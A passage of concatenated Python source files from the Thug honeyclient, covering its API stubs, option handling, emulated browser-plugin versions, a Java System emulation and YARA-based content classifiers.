@param cls_type: Classifier type
@param cls_type: C{str}
@param method: Classifier method
@param method: method
@return: None
"""
def reset_customclassifiers():
"""
reset_customclassifiers
Reset all the custom classifiers
@return: None
"""
def log_event():
"""
log_event
Log the URL analysis results
@return None
"""
def run_local(url):
"""
run_local
This method should be invoked by 'analyze' method for local file analysis
@param url: URL to analyze
@type url: C{str}
"""
def run_remote(url):
"""
run_remote
This method should be invoked by 'run' method for URL analysis
@param url: URL to analyze
@type url: C{str}
"""
def analyze():
"""
analyze
This method is called when the ThugAPI subclass is called and MUST be
implemented. This method can reference just the 'args' class attribute.
Returning something from this method is up to you if needed.
"""
| 19,217
|
Python
|
.py
| 676
| 19.616864
| 90
| 0.567727
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,047
|
abstractmethod.py
|
buffer_thug/thug/ThugAPI/abstractmethod.py
|
#!/usr/bin/env python
import sys
class abstractmethod:
    """Decorator marking a method as abstract.

    Wrapping a function with this class replaces it with a callable that
    raises NotImplementedError when invoked, forcing subclasses to
    override it.
    """

    def __init__(self, func):
        # Keep the wrapped function so its name can be reported and so
        # introspection can still reach the original.
        self.func = func

    def __call__(self, *args, **kwds):
        # The old Python 2 `func.func_name` fallback was dead code: the
        # f-string below already requires Python >= 3.6, so __name__ is
        # always available and the sys.version_info check was removed.
        raise NotImplementedError(f"Method {self.func.__name__} is abstract")
| 341
|
Python
|
.py
| 10
| 27.5
| 86
| 0.611621
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,048
|
__init__.py
|
buffer_thug/thug/ThugAPI/__init__.py
|
from .ThugAPI import ThugAPI # noqa: F401
from .ThugOpts import ThugOpts # noqa: F401
from .ThugVulnModules import ThugVulnModules # noqa: F401
| 147
|
Python
|
.py
| 3
| 48
| 58
| 0.791667
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,049
|
ThugVulnModules.py
|
buffer_thug/thug/ThugAPI/ThugVulnModules.py
|
#!/usr/bin/env python
#
# ThugVulnModules.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
log = logging.getLogger("Thug")
class ThugVulnModules(dict):
    """Holds the emulated (vulnerable) browser plugin configuration.

    Tracks the Adobe Acrobat Reader, Shockwave Flash, Java plugin and
    Silverlight versions presented to analyzed content, together with a
    per-plugin "disabled" flag.
    """

    def __init__(self):
        super().__init__()
        self._acropdf_pdf = "9.1.0"
        self._acropdf_disabled = False
        self._shockwave_flash = "10.0.64.0"
        self._shockwave_flash_disabled = False
        self._javaplugin = "1.6.0.32"
        self._javaplugin_disabled = False
        self._silverlight = "4.0.50826.0"
        self._silverlight_disabled = False

    def invalid_version(self, version):
        """Return True unless every dot-separated field is numeric."""
        return any(not field.isdigit() for field in version.split("."))

    def get_acropdf_pdf(self):
        return self._acropdf_pdf

    @property
    def acropdf(self):
        return self._acropdf_pdf

    def set_acropdf_pdf(self, version):
        if self.invalid_version(version):
            log.warning(
                "[WARNING] Invalid Adobe Acrobat Reader version provided (using default one)"
            )
            return

        self._acropdf_pdf = version

    acropdf_pdf = property(get_acropdf_pdf, set_acropdf_pdf)

    def disable_acropdf(self):
        self._acropdf_disabled = True

    @property
    def acropdf_disabled(self):
        return self._acropdf_disabled

    def get_shockwave_flash(self):
        return self._shockwave_flash

    def set_shockwave_flash(self, version):
        # Only major versions 8-12 are emulated.
        major = version.partition(".")[0]
        if major not in ("8", "9", "10", "11", "12") or self.invalid_version(version):
            log.warning(
                "[WARNING] Invalid Shockwave Flash version provided (using default one)"
            )
            return

        self._shockwave_flash = version

    shockwave_flash = property(get_shockwave_flash, set_shockwave_flash)

    def disable_shockwave_flash(self):
        self._shockwave_flash_disabled = True

    @property
    def shockwave_flash_disabled(self):
        return self._shockwave_flash_disabled

    def get_javaplugin(self):
        # "1.6.0.32" -> "160_32": dots dropped, last field after "_".
        # NOTE(review): Java/System.getProperty("java.version") keeps the
        # dots ("1.6.0_32") instead — presumably this dotless form is
        # intentional for the plugin description; confirm before unifying.
        *fields, build = self._javaplugin.split(".")
        return f"{''.join(fields)}_{build}"

    def set_javaplugin(self, version):
        if self.invalid_version(version):
            log.warning(
                "[WARNING] Invalid JavaPlugin version provided (using default one)"
            )
            return

        fields = version.split(".")
        # Normalize to four fields, zero-padding a single-digit build
        # number (e.g. "1.7.0.2" -> "1.7.0.02").
        fields.extend("0" for _ in range(4 - len(fields)))
        if len(fields[3]) == 1:
            fields[3] = f"0{fields[3]}"

        self._javaplugin = ".".join(fields)

    javaplugin = property(get_javaplugin, set_javaplugin)

    def disable_javaplugin(self):
        self._javaplugin_disabled = True

    @property
    def javaplugin_disabled(self):
        return self._javaplugin_disabled

    @property
    def javawebstart_isinstalled(self):
        # "1.6.0.32" -> "1.6.0.0": drop the build field, append ".0".
        fields = self._javaplugin.split(".")[:-1]
        return f"{'.'.join(fields)}.0"

    def get_silverlight(self):
        return self._silverlight

    def set_silverlight(self, version):
        # Only major versions 1-5 are emulated.
        major = version.partition(".")[0]
        if major not in ("1", "2", "3", "4", "5") or self.invalid_version(version):
            log.warning(
                "[WARNING] Invalid Silverlight version provided (using default one)"
            )
            return

        self._silverlight = version

    silverlight = property(get_silverlight, set_silverlight)

    def disable_silverlight(self):
        self._silverlight_disabled = True

    @property
    def silverlight_disabled(self):
        return self._silverlight_disabled
| 4,382
|
Python
|
.py
| 122
| 27.778689
| 93
| 0.622722
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,050
|
ThugOpts.py
|
buffer_thug/thug/ThugAPI/ThugOpts.py
|
#!/usr/bin/env python
#
# ThugOpts.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import sys
import logging
from urllib.parse import urlparse
from thug.DOM.Personality import Personality
log = logging.getLogger("Thug")
class ThugOpts(dict):
    """Container for every user-configurable Thug analysis option.

    Each option lives in a private attribute and is exposed both as a
    get_X/set_X method pair and as a property built from that pair,
    because the ThugAPI layer drives options through either interface.
    """

    # URL schemes accepted by set_proxy
    proxy_schemes = (
        "http",
        "socks4",
        "socks5",
        "socks5h",
    )

    def __init__(self):
        super().__init__()
        self._verbose = False
        self._debug = False
        self._proxy = None
        self._raise_for_proxy = True
        self.local = False
        self.extensive = False
        self._threshold = 0             # max number of pages to fetch (0 = unlimited)
        self._connect_timeout = 10      # seconds
        self._proxy_connect_timeout = 5  # seconds
        self._timeout = 600             # whole-analysis timeout, seconds
        self.ast_debug = False
        self.http_debug = 0
        self._useragent = "winxpie60"   # default emulated personality
        self._referer = "about:blank"
        self._events = []               # extra DOM events to emulate
        self._delay = 0                 # setTimeout/setInterval cap, ms
        self._attachment = False
        self._file_logging = False
        self._json_logging = False
        self._es_logging = False
        self._code_logging = True
        self._cert_logging = True
        self._features_logging = False
        self._screenshot = False
        self._awis = False
        self._no_fetch = False
        self._broken_url = False
        self._ssl_verify = False
        self._mongodb_address = None
        self._web_tracking = False
        self._async_prefetch = False
        self._honeyagent = True
        self.activex_ready = True
        self._image_processing = False
        self._download_prevent = True
        self.Personality = Personality()

    def set_verbose(self, verbose):
        self._verbose = verbose

    def get_verbose(self):
        return self._verbose

    verbose = property(get_verbose, set_verbose)

    def set_debug(self, debug):
        self._debug = debug

    def get_debug(self):
        return self._debug

    debug = property(get_debug, set_debug)

    def set_proxy(self, proxy):
        """Validate and store the proxy URL.

        NOTE: an invalid scheme terminates the whole process via
        sys.exit(0) (the message says [ERROR] but is logged as a warning).
        """
        if not proxy:
            self._proxy = None
            return

        p = urlparse(proxy)
        if p.scheme.lower() not in self.proxy_schemes:
            log.warning(
                "[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5, socks5h)"
            )
            sys.exit(0)

        self._proxy = proxy

    def get_proxy(self):
        return self._proxy

    proxy = property(get_proxy, set_proxy)

    def set_raise_for_proxy(self, raise_for_proxy):
        self._raise_for_proxy = raise_for_proxy

    def get_raise_for_proxy(self):
        return self._raise_for_proxy

    raise_for_proxy = property(get_raise_for_proxy, set_raise_for_proxy)

    def get_useragent(self):
        return self._useragent

    def set_useragent(self, useragent):
        # Unknown personalities are rejected and the current one is kept.
        if useragent not in self.Personality:
            log.warning(
                '[WARNING] Invalid User Agent provided (using default "%s")',
                self._useragent,
            )
            return

        self._useragent = useragent

    useragent = property(get_useragent, set_useragent)

    def get_referer(self):
        return self._referer

    def set_referer(self, referer):
        self._referer = referer

    referer = property(get_referer, set_referer)

    def get_events(self):
        return self._events

    def set_events(self, events):
        """Merge a comma-separated event list into the emulated events.

        An empty/falsy value resets the list; otherwise new (lowercased,
        stripped) events accumulate across calls without duplicates.
        """
        if not events:
            self._events = []
            return

        for e in events.split(","):
            evt = e.lower().strip()
            if evt not in self._events:
                self._events.append(evt)

    events = property(get_events, set_events)

    def get_delay(self):
        return self._delay

    def set_delay(self, timeout):
        # Negative values are accepted and stored as their absolute value.
        try:
            _timeout = int(timeout)
        except ValueError:
            log.warning("[WARNING] Ignoring invalid delay value (should be an integer)")
            return

        self._delay = abs(_timeout)

    delay = property(get_delay, set_delay)

    def get_attachment(self):
        return self._attachment

    def set_attachment(self, attachment):
        self._attachment = attachment

    attachment = property(get_attachment, set_attachment)

    def get_image_processing(self):
        return self._image_processing

    def set_image_processing(self, image_processing):
        self._image_processing = image_processing

    image_processing = property(get_image_processing, set_image_processing)

    def get_file_logging(self):
        return self._file_logging

    def set_file_logging(self, file_logging):
        self._file_logging = file_logging

    file_logging = property(get_file_logging, set_file_logging)

    def get_json_logging(self):
        return self._json_logging

    def set_json_logging(self, json_logging):
        self._json_logging = json_logging

    json_logging = property(get_json_logging, set_json_logging)

    def get_es_logging(self):
        return self._es_logging

    def set_es_logging(self, es_logging):
        self._es_logging = es_logging

    elasticsearch_logging = property(get_es_logging, set_es_logging)

    def get_code_logging(self):
        return self._code_logging

    def set_code_logging(self, code_logging):
        self._code_logging = code_logging

    code_logging = property(get_code_logging, set_code_logging)

    def get_cert_logging(self):
        return self._cert_logging

    def set_cert_logging(self, cert_logging):
        self._cert_logging = cert_logging

    cert_logging = property(get_cert_logging, set_cert_logging)

    def get_features_logging(self):
        return self._features_logging

    def set_features_logging(self, features_logging):
        self._features_logging = features_logging

    features_logging = property(get_features_logging, set_features_logging)

    def get_no_fetch(self):
        return self._no_fetch

    def set_no_fetch(self, fetch):
        self._no_fetch = fetch

    no_fetch = property(get_no_fetch, set_no_fetch)

    def get_download_prevent(self):
        return self._download_prevent

    def set_download_prevent(self, download_prevent):
        self._download_prevent = download_prevent

    download_prevent = property(get_download_prevent, set_download_prevent)

    def get_threshold(self):
        return self._threshold

    def set_threshold(self, threshold):
        try:
            value = int(threshold)
        except ValueError:
            log.warning(
                "[WARNING] Ignoring invalid threshold value (should be an integer)"
            )
            return

        self._threshold = value

    threshold = property(get_threshold, set_threshold)

    def get_connect_timeout(self):
        return self._connect_timeout

    def set_connect_timeout(self, timeout):
        try:
            seconds = int(timeout)
        except ValueError:
            log.warning(
                "[WARNING] Ignoring invalid connect timeout value (should be an integer)"
            )
            return

        self._connect_timeout = seconds

    connect_timeout = property(get_connect_timeout, set_connect_timeout)

    def get_proxy_connect_timeout(self):
        return self._proxy_connect_timeout

    def set_proxy_connect_timeout(self, timeout):
        try:
            seconds = int(timeout)
        except ValueError:
            log.warning(
                "[WARNING] Ignoring invalid proxy connect timeout value (should be an integer)"
            )
            return

        self._proxy_connect_timeout = seconds

    proxy_connect_timeout = property(
        get_proxy_connect_timeout, set_proxy_connect_timeout
    )

    def get_timeout(self):
        return self._timeout

    def set_timeout(self, timeout):
        try:
            seconds = int(timeout)
        except ValueError:
            log.warning(
                "[WARNING] Ignoring invalid timeout value (should be an integer)"
            )
            return

        self._timeout = seconds

    timeout = property(get_timeout, set_timeout)

    def get_screenshot(self):
        return self._screenshot

    def set_screenshot(self, screenshot):
        self._screenshot = screenshot

    screenshot = property(get_screenshot, set_screenshot)

    def get_awis(self):
        return self._awis

    def set_awis(self, awis):
        self._awis = awis

    awis = property(get_awis, set_awis)

    def get_broken_url(self):
        return self._broken_url

    def set_broken_url(self, mode):
        self._broken_url = mode

    broken_url = property(get_broken_url, set_broken_url)

    def get_ssl_verify(self):
        return self._ssl_verify

    def set_ssl_verify(self, verify):
        self._ssl_verify = verify

    ssl_verify = property(get_ssl_verify, set_ssl_verify)

    def get_web_tracking(self):
        return self._web_tracking

    def set_web_tracking(self, enabled):
        self._web_tracking = enabled

    web_tracking = property(get_web_tracking, set_web_tracking)

    def get_async_prefetch(self):
        return self._async_prefetch

    def set_async_prefetch(self, enabled):
        self._async_prefetch = enabled

    async_prefetch = property(get_async_prefetch, set_async_prefetch)

    def get_honeyagent(self):
        return self._honeyagent

    def set_honeyagent(self, enabled):
        self._honeyagent = enabled

    honeyagent = property(get_honeyagent, set_honeyagent)

    def get_mongodb_address(self):
        return self._mongodb_address

    def set_mongodb_address(self, mongodb_address):
        self._mongodb_address = mongodb_address

    mongodb_address = property(get_mongodb_address, set_mongodb_address)
| 10,186
|
Python
|
.py
| 273
| 29.274725
| 95
| 0.643921
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,051
|
java.py
|
buffer_thug/thug/Java/java.py
|
#!/usr/bin/env python
#
# java.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
from .lang import lang
class java:
    """Root of the emulated Java package hierarchy (exposes java.lang)."""

    def __init__(self):
        # `lang` mirrors the java.lang package (provides java.lang.System)
        self.lang = lang()
| 763
|
Python
|
.py
| 21
| 34.619048
| 70
| 0.760487
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,052
|
lang.py
|
buffer_thug/thug/Java/lang.py
|
#!/usr/bin/env python
#
# lang.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
from .System import System
class lang:
    """Emulation of the java.lang package namespace."""

    def __init__(self):
        # Expose an instance of the emulated java.lang.System class
        self.System = System()
| 771
|
Python
|
.py
| 21
| 35
| 70
| 0.763052
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,053
|
System.py
|
buffer_thug/thug/Java/System.py
|
#!/usr/bin/env python
#
# System.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
log = logging.getLogger("Thug")
class System:
    """Minimal emulation of the Java ``java.lang.System`` class."""

    @staticmethod
    def getProperty(_property):
        """Return the emulated value for a Java system property.

        Only ``java.version`` and ``java.vendor`` are emulated; every
        other property resolves to an empty string.
        """
        if _property == "java.version":
            # Turn the dotted plugin version (e.g. "1.6.0.32") into the
            # Java-style "1.6.0_32" form.
            release, _, build = log.ThugVulnModules._javaplugin.rpartition(".")
            return f"{release}_{build}"

        if _property == "java.vendor":
            return "Sun Microsystems Inc."

        return ""  # pragma: no cover
| 1,109
|
Python
|
.py
| 29
| 34.275862
| 70
| 0.711359
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,054
|
TextClassifier.py
|
buffer_thug/thug/Classifier/TextClassifier.py
|
#!/usr/bin/env python
#
# TextClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class TextClassifier(BaseClassifier):
    """Yara-based classifier for textual content.

    Runs the text classification/filter rules over fetched content and
    reports every previously-unseen match through the Thug logging
    subsystem.
    """

    default_rule_file = "rules/textclassifier.yar"
    default_filter_file = "rules/textfilter.yar"
    _classifier = "Text Classifier"

    def __init__(self):
        super().__init__()

    def classify(self, url, text):
        """Match *text* from *url* against the rules, then run custom classifiers."""
        for match in self.rules.match(data=text):
            entry = (url, match)
            if entry in self.matches:
                continue

            self.matches.append(entry)

            if self.discard_url_match(url, match):  # pragma: no cover
                continue

            self.handle_match_etags(match)

            # Yara tags use "_" as a word separator; render them human-readable.
            tags = ",".join(" ".join(t.split("_")) for t in match.tags)
            log.ThugLogging.log_classifier("text", url, match.rule, tags, match.meta)

        for handler in self.custom_classifiers.values():
            handler(url, text)

    def filter(self, url, html):
        """Return True when at least one text filter rule matches *html*."""
        matched = False

        for match in self.filters.match(data=html):
            tags = ",".join(" ".join(t.split("_")) for t in match.tags)
            log.ThugLogging.log_classifier("textfilter", url, match.rule, tags, match.meta)
            matched = True

        return matched
| 2,070
|
Python
|
.py
| 49
| 35.408163
| 86
| 0.661684
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,055
|
ImageClassifier.py
|
buffer_thug/thug/Classifier/ImageClassifier.py
|
#!/usr/bin/env python
#
# ImageClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class ImageClassifier(BaseClassifier):
    """Yara-based classifier for image-derived content.

    Runs the image classification/filter rules over extracted content
    and reports every previously-unseen match through the Thug logging
    subsystem.
    """

    default_rule_file = "rules/imageclassifier.yar"
    default_filter_file = "rules/imagefilter.yar"
    _classifier = "Image Classifier"

    def __init__(self):
        super().__init__()

    def classify(self, url, text):
        """Match *text* from *url* against the rules, then run custom classifiers."""
        for match in self.rules.match(data=text):
            entry = (url, match)
            if entry in self.matches:
                continue

            self.matches.append(entry)

            if self.discard_url_match(url, match):
                continue

            self.handle_match_etags(match)

            # Yara tags use "_" as a word separator; render them human-readable.
            tags = ",".join(" ".join(t.split("_")) for t in match.tags)
            log.ThugLogging.log_classifier("image", url, match.rule, tags, match.meta)

        for handler in self.custom_classifiers.values():
            handler(url, text)

    def filter(self, url, text):
        """Return True when at least one image filter rule matches *text*."""
        matched = False

        for match in self.filters.match(data=text):
            tags = ",".join(" ".join(t.split("_")) for t in match.tags)
            log.ThugLogging.log_classifier("imagefilter", url, match.rule, tags, match.meta)
            matched = True

        return matched
| 2,057
|
Python
|
.py
| 49
| 35.142857
| 86
| 0.662989
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,056
|
CookieClassifier.py
|
buffer_thug/thug/Classifier/CookieClassifier.py
|
#!/usr/bin/env python
#
# CookieClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class CookieClassifier(BaseClassifier):
    """Classify and filter HTTP cookies with YARA rules."""

    default_rule_file = "rules/cookieclassifier.yar"
    default_filter_file = "rules/cookiefilter.yar"
    _classifier = "Cookie Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, url, cookie):
        """Run classification rules against *cookie*, logging each new match."""
        for m in self.rules.match(data=cookie):
            entry = (url, m)

            # Skip (url, match) pairs already seen in this session.
            if entry in self.matches:
                continue

            self.matches.append(entry)

            if self.discard_url_match(url, m):  # pragma: no cover
                continue

            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("cookie", url, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](url, cookie)

    def filter(self, url, cookie):
        """Return True when at least one filter rule matches *cookie*."""
        matched = False

        for m in self.filters.match(data=cookie):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("cookiefilter", url, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 2,094
|
Python
|
.py
| 49
| 35.897959
| 86
| 0.665682
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,057
|
JSClassifier.py
|
buffer_thug/thug/Classifier/JSClassifier.py
|
#!/usr/bin/env python
#
# JSClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class JSClassifier(BaseClassifier):
    """Classify and filter JavaScript code with YARA rules."""

    default_rule_file = "rules/jsclassifier.yar"
    default_filter_file = "rules/jsfilter.yar"
    _classifier = "JS Classifier"

    def __init__(self):
        BaseClassifier.__init__(self)

    def classify(self, url, script):
        """Run classification rules against *script*, logging each match."""
        # NOTE(review): unlike CookieClassifier, duplicate (url, match)
        # pairs are not skipped here — confirm this is intentional.
        for m in self.rules.match(data=script):
            self.matches.append((url, m))

            if self.discard_url_match(url, m):  # pragma: no cover
                continue

            self.handle_match_etags(m)
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("js", url, m.rule, joined_tags, m.meta)

        # User-supplied classifiers always run, regardless of rule matches.
        for name in list(self.custom_classifiers):
            self.custom_classifiers[name](url, script)

    def filter(self, url, script):
        """Return True when at least one filter rule matches *script*."""
        matched = False

        for m in self.filters.match(data=script):
            joined_tags = ",".join(" ".join(tag.split("_")) for tag in m.tags)
            log.ThugLogging.log_classifier("jsfilter", url, m.rule, joined_tags, m.meta)
            matched = True

        return matched
| 1,996
|
Python
|
.py
| 47
| 35.978723
| 86
| 0.668217
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,058
|
BaseClassifier.py
|
buffer_thug/thug/Classifier/BaseClassifier.py
|
#!/usr/bin/env python
#
# BaseClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import operator
import logging
from urllib.parse import urlparse
import yara
log = logging.getLogger("Thug")
class BaseClassifier:
    """Common machinery shared by all Thug YARA-based classifiers.

    Subclasses declare ``default_rule_file``, ``default_filter_file`` and
    ``_classifier`` and implement their own ``classify``/``filter``.
    Rule and filter files are resolved relative to
    ``log.configuration_path``.
    """

    def __init__(self):
        # (subject, yara match) pairs collected by subclasses.
        self.matches = []
        # Name -> bound-method mapping of user-registered classifiers.
        self.custom_classifiers = {}
        self.init_rules()
        self.init_filters()

    @property
    def classifier(self):
        """Human-readable classifier name (empty if the subclass sets none)."""
        return getattr(self, "_classifier", "")

    def init_rules(self):
        """Compile the default classification rules, if the rule file exists.

        Silently (with a warning) skips compilation when the subclass does
        not declare a default rule file or the file is missing on disk.
        """
        self._rules = {}
        self.rules_namespace_id = 1
        p = getattr(self, "default_rule_file", None)
        if p is None:  # pragma: no cover
            log.warning(
                "[%s] Skipping not existing default classification rule file",
                self.classifier,
            )
            return
        r = os.path.join(log.configuration_path, p)
        if not os.path.exists(r):  # pragma: no cover
            log.warning(
                "[%s] Skipping not existing default classification rule file",
                self.classifier,
            )
            return
        self._rules["namespace0"] = r
        self.rules = yara.compile(filepaths=self._rules)

    def init_filters(self):
        """Compile the default filter rules, if the filter file exists."""
        self._filters = {}
        self.filters_namespace_id = 1
        p = getattr(self, "default_filter_file", None)
        if p is None:  # pragma: no cover
            log.warning(
                "[%s] Skipping not existing default filter file", self.classifier
            )
            return
        r = os.path.join(log.configuration_path, p)
        if not os.path.exists(r):  # pragma: no cover
            log.warning(
                "[%s] Skipping not existing default filter file", self.classifier
            )
            return
        self._filters["namespace0"] = r
        self.filters = yara.compile(filepaths=self._filters)

    def add_rule(self, rule_file):
        """Add an extra rule file under a fresh namespace and recompile."""
        if not os.path.exists(rule_file):
            log.warning(
                "[%s] Skipping not existing classification rule file %s",
                self.classifier,
                rule_file,
            )
            return
        self._rules[f"namespace{self.rules_namespace_id}"] = rule_file
        self.rules_namespace_id += 1
        # Recompilation includes all previously added rule files.
        self.rules = yara.compile(filepaths=self._rules)

    def add_filter(self, filter_file):
        """Add an extra filter file under a fresh namespace and recompile."""
        if not os.path.exists(filter_file):
            log.warning(
                "[%s] Skipping not existing filter file %s",
                self.classifier,
                filter_file,
            )
            return
        self._filters[f"namespace{self.filters_namespace_id}"] = filter_file
        self.filters_namespace_id += 1
        self.filters = yara.compile(filepaths=self._filters)

    def discard_meta_domain_whitelist(self, url, values):
        """Return True when *url*'s host is covered by the whitelist in *values*.

        *values* is a comma-separated list of domains from a rule's meta
        section; a domain matches the URL host exactly or as a parent
        domain (suffix match on ".domain").
        """
        p_url = urlparse(url)
        netloc = p_url.netloc.split(":")[
            0
        ].lower()  # Remove the port from netloc, if present

        for value in values.split(","):
            domain = value.lower().strip()
            if not domain:  # pragma: no cover
                continue

            # Match either the exact host or any subdomain of it.
            prefix = "" if domain.startswith(".") else "."

            if netloc in (domain,) or netloc.endswith(f"{prefix}{domain}"):
                log.warning(
                    "[discard_meta_domain_whitelist] Whitelisted domain: %s (URL: %s)",
                    domain,
                    url,
                )
                return True

        return False

    def discard_url_match(self, url, match):
        """Return True when any rule-meta handler votes to discard this match.

        Each meta key ``K`` dispatches to a ``discard_meta_K`` method, if one
        is defined on the classifier (e.g. ``domain_whitelist`` above).
        """
        for key, values in match.meta.items():
            m = getattr(self, f"discard_meta_{key}", None)
            if m and m(url, values):  # pylint:disable=not-callable
                return True

        return False

    def add_customclassifier(self, method):
        """Register a user-supplied classifier function, bound to this instance."""
        if not callable(method):
            log.warning("Skipping non callable custom classifier %s", str(method))
            return

        get_function_code = operator.attrgetter("__code__")
        method_name = get_function_code(method).co_name
        # __get__ binds the plain function to this instance so it receives self.
        self.custom_classifiers[method_name] = method.__get__(self)

    def reset_customclassifiers(self):
